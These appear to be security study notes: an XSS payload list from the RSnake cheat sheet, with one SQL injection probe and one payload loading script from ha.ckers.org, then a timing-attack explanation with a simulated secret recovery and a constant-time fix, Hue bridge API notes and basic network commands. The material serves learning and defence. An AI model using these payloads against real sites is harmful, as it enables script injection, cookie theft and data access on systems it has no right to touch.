Cross Site Scripting
<ScRipt>ALeRt("hi");</sCRipT> ">
<script>confirm(String.fromCharCode(45,45,45,45))</script> ">
<img src="<img src=search"/onerror=alert("XSS")//">
"><img src=x onerror=prompt(document.domain)>
"><img src=x onerror=alert(document.domain)>
"><img src=x onerror=alert(1)>
<script>eval(String.fromCharCode(97,108,101,114,116,40,34,104,105,34,41,59))</script>  (the char codes spell alert("hi"); without eval the expression only builds the string and nothing runs)
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e  (URL-encoded <script>alert("Hi");</script>)
"><script>alert("Hi");</script>
"--></style></script><script>alert("xss")</script>
'';!--"<XSS>=&{()}
'> <*script>alert("owned")<*/script>
%7B%7D%bmk=1
<SCRIPT src=http://ha.ckers.org/xss.js></SCRIPT>
<IMG src="javascript:alert('XSS');">
<IMG src=javascript:alert('XSS')>  (the RSnake cheat sheet repeats this payload with the javascript: URL written as decimal HTML entities, padded entities and hex entities; those encodings did not survive extraction, so the copies are collapsed here)
<IMG src=javascript:alert("XSS")>
<IMG src=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG src=javascript:alert(String.fromCharCode(88,83,83))>
<IMG src="jav ascript:alert('XSS');">  (in the original cheat sheet the gap between jav and ascript is an embedded tab, newline or carriage return, which browsers strip inside the URL scheme; extraction has turned each variant into a plain space)
<script>alert(document.cookie)</script>
php?name=<img+src=x+onerror=alert(1)>  (the img payload as sent in a query string, with spaces plus-encoded)
',alert(1),'
\x27\x2calert\x281\x29\x2c\x27  (the same payload hex-escaped)
?id=1'+or+id=2--+  (a SQL injection probe, not XSS)
<object data="javascript:alert('XSS')"></object>
What is a timing attack?
import hashlib

def authenticate_user(user, password):
    stored_hash = get_password_hash(user)  # hex SHA-1 digest, or None for an unknown user
    if stored_hash:
        test_hash = hashlib.sha1(password.encode()).hexdigest()
        # Vulnerable: == compares byte by byte and returns at the first
        # mismatch, so the time it takes leaks how long the matching prefix is.
        if test_hash == stored_hash:
            return True
        else:
            return False
String Comparison Timing Attacks?
memcmp (the trailing byte-by-byte loop of glibc's generic string/memcmp.c)

  while (len != 0)
    {
      a0 = ((byte *) srcp1)[0];
      b0 = ((byte *) srcp2)[0];
      srcp1 += 1;
      srcp2 += 1;
      res = a0 - b0;
      if (res != 0)
        return res;   /* returns at the first differing byte: the run time
                         depends on how many leading bytes matched */
      len -= 1;
    }
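To make the leak concrete, here is an added example (not code from the page) that simulates the attack against a Python mirror of that memcmp loop and then shows the constant-time replacement for the authenticate_user comparison. The secret value, the use of loop-iteration counts in place of measured time, and the function names are constructed for this example.

```python
import hashlib
import hmac

# Constructed sample secret: the value the server compares against (an API
# token, or the stored hash). The attacker controls only the other operand.
SECRET = b"s3cr3t-t0k3n"


def leaky_compare(a, b):
    """Python mirror of the memcmp byte loop: compare until the first mismatch.

    Returns (result, bytes_examined). Each byte examined is one more loop
    iteration, so bytes_examined stands in for the elapsed time a remote
    attacker would measure; counting iterations instead of clock cycles keeps
    the simulation deterministic.
    """
    n = min(len(a), len(b))
    for i in range(n):
        if a[i] != b[i]:
            return a[i] - b[i], i + 1   # early exit: this is the leak
    return len(a) - len(b), n           # every common byte matched


def recover_secret(secret):
    """Simulated timing attack against leaky_compare.

    The attacker knows the length, submits one candidate per byte value at each
    position and keeps the byte whose comparison ran the longest. The final byte
    is confirmed by the comparison succeeding outright (result == 0), because a
    mismatch in the last byte costs exactly as many iterations as a match.
    """
    guess = bytearray()
    for pos in range(len(secret)):
        best_byte, best_cost = 0, -1
        for c in range(256):
            candidate = bytes(guess) + bytes([c]) + b"\x00" * (len(secret) - pos - 1)
            result, cost = leaky_compare(candidate, secret)
            if result == 0:
                return candidate
            if cost > best_cost:
                best_byte, best_cost = c, cost
        guess.append(best_byte)
    return bytes(guess)


def verify_token_leaky(stored, presented):
    """Check in the style of the page's authenticate_user: == exits early like memcmp."""
    return presented == stored


def verify_token_constant_time(stored, presented):
    """Hardened form: hmac.compare_digest looks at every byte no matter where the
    first mismatch is, so its running time does not depend on the matching prefix."""
    return hmac.compare_digest(stored, presented)


def authenticate_user_fixed(stored_hash, password):
    """The page's authenticate_user with only the comparison changed.

    Assumes stored_hash is a hex SHA-1 digest, as in the page's pseudocode;
    SHA-1 of a password is kept to match the page, a real system should use a
    password hash such as scrypt or argon2.
    """
    test_hash = hashlib.sha1(password.encode()).hexdigest()
    return hmac.compare_digest(test_hash, stored_hash)


if __name__ == "__main__":
    recovered = recover_secret(SECRET)
    print("recovered:", recovered, "correct:", recovered == SECRET)
```

The simulation recovers the whole secret with at most 256 tries per byte instead of 256^12 for the full value. Against the page's authenticate_user the attacker does not control the compared bytes directly, only the password that is hashed, so the leak reveals the stored hash a prefix at a time rather than the password; the attack is most direct where the presented value is compared as-is, such as API tokens or MAC tags. Real measurements are noisy and need many repetitions per guess, which is why the example counts iterations rather than timing CPython's == operator.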
What is the Hue API?
● GET /api/<user token>/lights
● Basic RESTful API
● Not very smart - always returns HTTP status 200 even when returning errors.
● User token is the only required auth (no username, no sessions)
● Not very fast (can handle ~30 req/s)
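A client that copes with the two properties above (errors arriving with status 200, and the ~30 req/s ceiling), as an added example rather than code from the page. The sample responses are constructed, the error element layout ([{"error": {"type", "address", "description"}}]) and the "unauthorized user" type-1 code are assumed from the bridge's error format rather than stated on the page, and the bridge address, token and function names are placeholders.

```python
import json
import time
import urllib.request

# Constructed sample bodies. Both come back with HTTP 200; only the body tells
# them apart. The error layout is an assumption about the bridge's format.
SAMPLE_LIGHTS = (200, '{"1": {"state": {"on": true, "bri": 254}, "name": "Hue color lamp 1"}}')
SAMPLE_UNAUTHORIZED = (200, '[{"error": {"type": 1, "address": "/lights", '
                            '"description": "unauthorized user"}}]')


class HueError(Exception):
    """Raised when the body carries error elements, whatever the HTTP status said."""


def classify_response(status, body):
    """Return ("ok", data) or ("error", [error dicts]).

    The status code is deliberately not consulted: the bridge answers 200 on
    errors too, so a client that branches on status alone treats
    "unauthorized user" as success and a token scan would report every token valid.
    """
    data = json.loads(body)
    if isinstance(data, list):
        errors = [item["error"] for item in data
                  if isinstance(item, dict) and "error" in item]
        if errors:
            return "error", errors
    return "ok", data


def http_get(url):
    """Default transport: plain HTTP GET returning (status, body).
    Nothing is contacted unless a caller passes this as the transport."""
    with urllib.request.urlopen(url, timeout=5) as resp:
        return resp.status, resp.read().decode()


def get_lights(bridge, token, send=http_get, rate=30.0, sleep=time.sleep):
    """GET /api/<token>/lights and return the lights dict, raising HueError when
    the 200 response actually carries an error.

    `send` is injectable so the logic can be exercised offline; `rate` paces
    calls at the page's ~30 req/s ceiling by sleeping 1/rate before each request.
    """
    sleep(1.0 / rate)
    status, body = send(f"http://{bridge}/api/{token}/lights")
    kind, payload = classify_response(status, body)
    if kind == "error":
        raise HueError("; ".join(f"type {e.get('type')}: {e.get('description')}"
                                 for e in payload))
    return payload


def token_is_valid(bridge, token, **kw):
    """True only when the bridge returned real light data for the token."""
    try:
        get_lights(bridge, token, **kw)
        return True
    except HueError:
        return False
```

The pacing is a fixed sleep rather than a token bucket because the page gives only a rough ceiling; the point that matters for security is that validity is decided by parsing the body, never by the status code.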
Network Administration Testing Methodologies:
- Ping host: ping <IP address>
- Trace route to host: tracert <website address> or <IP address> (tracert is the Windows command; Linux and macOS use traceroute)
- DNS lookup: nslookup <address>
- Whois: www.whois.net (or the whois <domain> command-line client)